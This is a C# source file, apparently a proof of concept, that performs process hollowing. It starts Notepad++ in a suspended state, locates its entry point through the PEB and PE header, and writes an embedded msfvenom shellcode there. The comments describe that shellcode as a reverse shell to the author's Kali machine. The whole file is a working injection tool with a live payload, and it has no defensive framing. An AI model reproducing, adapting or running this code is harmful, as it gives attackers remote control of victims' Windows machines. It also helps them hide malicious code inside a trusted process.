Program.cs

using System;
using System.Runtime.InteropServices;

namespace ProcessHollowingPOC
{
    class ProcessHollowingApplication
    {   //Structures imported for our program
        [StructLayout(LayoutKind.Sequential)]
        public struct SECURITY_ATTRIBUTE
        { public int nLength; public int bInheritHandle; }

        [StructLayout(LayoutKind.Sequential)]
        struct STARTUP_INFO
        { public Int32 cb; public Int32 dwX; public Int32 dwY; public Int32 dwXSize; public Int32 dwYSize; public Int32 dwXCountChars; public Int32 dwYCountChars; public Int32 dwFillAttribute; public Int32 dwFlags; public Int16 wShowWindow; public Int16 cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; }

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESS_INFO
        { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; }

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESS_BASIC_INFO
        { public IntPtr ExitStatus; public IntPtr PebAddress; public IntPtr BasePriority; public IntPtr UniquePID; public IntPtr InheritedFromUniqueProcessId; }

        //DLL's required "Kernel32.dll" to call our Windows API functions
        [DllImport("kernel32.dll")]
        static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTE lpProcessAttributes, ref SECURITY_ATTRIBUTE lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUP_INFO lpStartupInfo, out PROCESS_INFO lpProcessInformation);

        [DllImport("kernel32.dll")]
        static extern uint ResumeThread(IntPtr hThread);

        [DllImport("ntdll.dll")]
        static extern int ZwQueryInformationProcess(IntPtr hProcess, int procInformationClass, ref PROCESS_BASIC_INFO procInformation, uint ProcInfoLen, ref uint retlen);

        [DllImport("kernel32.dll")]
        static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);

        [DllImport("kernel32.dll")]
        public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);

        //Flags
        static uint CREATE_SUSPENDED = 0x4; static int ProcessBasicInformation = 0x0;

        static void Main(string[] args)
        {
            //Variables and their structures
            STARTUP_INFO StartupInformation = new STARTUP_INFO(); PROCESS_INFO ProcessInformation; SECURITY_ATTRIBUTE SecurityAttribute = new SECURITY_ATTRIBUTE();

            //Suspending our target process
            CreateProcess("C:\\Program Files\\Notepad++\\notepad++.exe", null, ref SecurityAttribute, ref SecurityAttribute, false, CREATE_SUSPENDED, IntPtr.Zero, null, ref StartupInformation, out ProcessInformation);

            //Querying the process information so we can get our process environment block address
            PROCESS_BASIC_INFO ProcessBasicInfo = new PROCESS_BASIC_INFO();
            uint retlen = 0;
            ZwQueryInformationProcess(ProcessInformation.hProcess, ProcessBasicInformation, ref ProcessBasicInfo, (uint)(IntPtr.Size * 6), ref retlen);

            //Reading memory to find our base image address.
            byte[] Buf = new byte[0x8];
            IntPtr NumBytesRead = IntPtr.Zero;
            ReadProcessMemory(ProcessInformation.hProcess, ProcessBasicInfo.PebAddress + 0x10, Buf, 0x8, out NumBytesRead);
            IntPtr ImageBaseAddress = (IntPtr)BitConverter.ToInt64(Buf, 0);

            //Reading the process memory to locate point of injection for our payload.
            byte[] Buf2 = new byte[0x200];
            ReadProcessMemory(ProcessInformation.hProcess, ImageBaseAddress, Buf2, 0x200, out NumBytesRead);
            uint FileAddressOfNewExe = BitConverter.ToUInt32(Buf2, 0x3c);
            uint AddressOfEntryPoint = FileAddressOfNewExe + 0x28;
            uint EntryPointRelativeVirtualAddress = BitConverter.ToUInt32(Buf2, (int)AddressOfEntryPoint);
            IntPtr EntryAddress = (IntPtr)((ulong)ImageBaseAddress + EntryPointRelativeVirtualAddress);

            //Payload created in Kali Linux through msfvenom, creates a reverse shell from the Windows OS to our Kali OS.
            byte[] TCPShellcode = new byte[460] {0xfc,0x48,0x83,0xe4,0xf0,
        0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,
        0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,
        0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,
        0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
        0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,
        0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,
        0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,
        0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,
        0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,
        0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,
        0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,
        0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,
        0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,
        0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,
        0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,
        0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,
        0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,
        0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,
        0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x22,
        0xb8,0xc0,0xa8,0x00,0x04,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,
        0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,
        0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,
        0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,
        0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,
        0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,
        0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,
        0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,
        0x63,0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x41,0x50,0x41,0x50,
        0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,
        0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x01,0x01,0x48,
        0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,0xe6,0x56,0x50,
        0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,
        0xff,0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,
        0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,
        0x41,0xba,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,
        0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
        0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
        0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5};

            //Deploying our payload into the hollowed process memory space and resuming to execute it.
            WriteProcessMemory(ProcessInformation.hProcess, EntryAddress, TCPShellcode, TCPShellcode.Length, out NumBytesRead);
            ResumeThread(ProcessInformation.hThread);
        }
    }
}